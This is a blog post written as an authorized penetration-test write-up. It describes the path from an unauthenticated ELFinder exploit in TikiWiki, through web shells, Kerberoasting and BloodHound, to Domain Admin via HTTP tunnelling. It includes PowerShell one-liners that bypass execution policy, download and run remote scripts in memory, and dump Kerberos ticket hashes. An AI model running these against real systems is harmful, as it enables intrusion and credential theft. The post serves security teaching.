In this blog post, I am going to discuss about the scenario of an assessment. Goal of the assessment was to test the overall posture of the network security from the prospective of an external attacker.
Nessus scan result was not useful.
Reverse Domain lookup
After trying Nessus scan, focused on manual stuff.
First preference was to enumerate the domain names hosted on the In-scope IPs.
Like always, Bing helped to find out the domain name mapped to those IPs.
Discovery of Vulnerable Plugin
The moment, Bing showed the ULR, unknown memory in my mind pointed the keyword "TikiWiki" CMS.
It was because of the URL "wiki/tiki-login_scr.php".
I searched on google for "TikiWiki" Remote Code execution exploit. I got bunch of exploits and one was interesting to me as it was unauthenticated one. Vulnerability was in third party plugin "ELFinder" Version 2.0.
Exploitation attempt
Metasploit module was available for the vulnerability
https://www.exploit-db.com/exploits/40091
After going through the Metasploit exploit module, I figured out that first MSF will check version of plugin by accessing the HTML file "web.com/vendor_extra/elfinder/elfinder.html". Once MSF confirm that the version of plugin is 2.0, it will fire the payload to PHP file "vendor_extra/elfinder/php/connector.minimal.php"
We tried the Metasploit module but failed with error message "Connection reset by peer".
This error message actually was actually hinting us to try manual approach.
Now we tried with manual approach and prepared the HTTP POST request body in Burp Suite.
This time, we followed below mentioned one:
https://www.exploit-db.com/exploits/40053
crafted the HTTP POST body with command execution function "system" and triggered the request.
It worked and we checked, PHP script was created on server successfully.
Now, uploaded PHP web shell as well to gain access on server.
PHP Web shell user access issue
Once Web shell access achieved, executed "systeminfo" and "whoami" command to check the environment and current user privilege.
Systeminfo returned the output and value of "Domain" in output showed that machine is member of organization's Active directory Domain.
Whoami command showed web shell is running with "IIS_IUSRS" user privilege.
At that point of time, next step was to run bloodhound script and Kerberoasting script.
But current user was not able to communicate to domain controller machine to perform kerberoasting or to gather the information.
I had cleared my mind and started correlating the things:
1. Web server is IIS
2. .NET is installed (Windows machine)
3. ASP webshell may have different privilege (NT AUTHORITY\NETWORK SERVICE etc)
The moment I tried with ASPX webshell and checked output of "whoami" command, it was "NT AUTHORITY\NETWORK SERVICE". Tried with Powerview script to enumerate the list of DC machines and it worked like a charm.
Again, I was in the game.
Kerberoasting and data gathering using BloodHound
It was Windows 2008 server machine so ran both the PowerShell scripts "in-Memory" and got the data.
For more information regarding Kerberoasting, please visit https://adsecurity.org/?p=3458
BloodHound PowerShell script to gather the info from AD
powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/incredibleindishell/Windows-AD-environment-related/master/Blood_Hound/bps_in.ps1'); Invoke-BloodHound -CollectionMethod All -CompressData -RemoveCSV
Kerberoasting PowerShell script to grab the "Kerberos TGS Ticket"
powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty hash | Out-File -filepath ticket_b0x.txt
Once BloodHound script gathered the data from Active directory, uploaded the ZIP file to Local BloodHound console.
In console, checked the the possibilities to gain Domain Admin user privilege from Kerberoastable user.
BloodHound showed that there are few users which can lead to Domain Admin user access.
Using Hashcat, tried with those specific users and got success after 1 day (Special Thanks to Ashwath Sir)
HTTP Tunneling trick to access the internally hosted machines
Now, target was to access the Internal sensitive machines such as Domain Controller.
Perimeter firewall outbound connection rules blocked the reverse shell connection.
To overcome the issue, I used HTTP tunneling script developed by NCC group "A Black Path Toward The Sun"
https://github.com/nccgroup/ABPTTS
Uploaded the ASPX script from ABTTS to the server. Started Python client script on my local machine and specified the DC Machine internal IP.
ABTTS HTTP tunneling script accepted traffic from my local machin, passed it to ASPX script uploaded on compromised machine and ASPX script decrypted and passed the traffic to internal machine.
This is how any internal machine was accessible on my localhost.
Later, took advantage of over-broad ACL permissions to reach the Domain Admin user account.
Thanks for reading.
Special thanks to Sean Metcalf, OJ, hacker fantastic, A K Reddy,Vincent Yiu, Andrew Robbins, will,
Benjamin Delpy, Marcello, Andrew van der Stock, g0tmi1k, Alvaro Muñoz, b33f, pancake, m3g9tr0n, Anurag Srivastava, vivek chauhan, Manoj and Karan
--==[[ With Love from Team IndiShell ]]==--
--==[[ Greetz To ]]==--
############################################################################################
#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba
#Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad
#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, Golden boy INDIA
#Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash, D3
#############################################################################################
--==[[Love to]]==--
#
My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai
ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir
#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
0 comments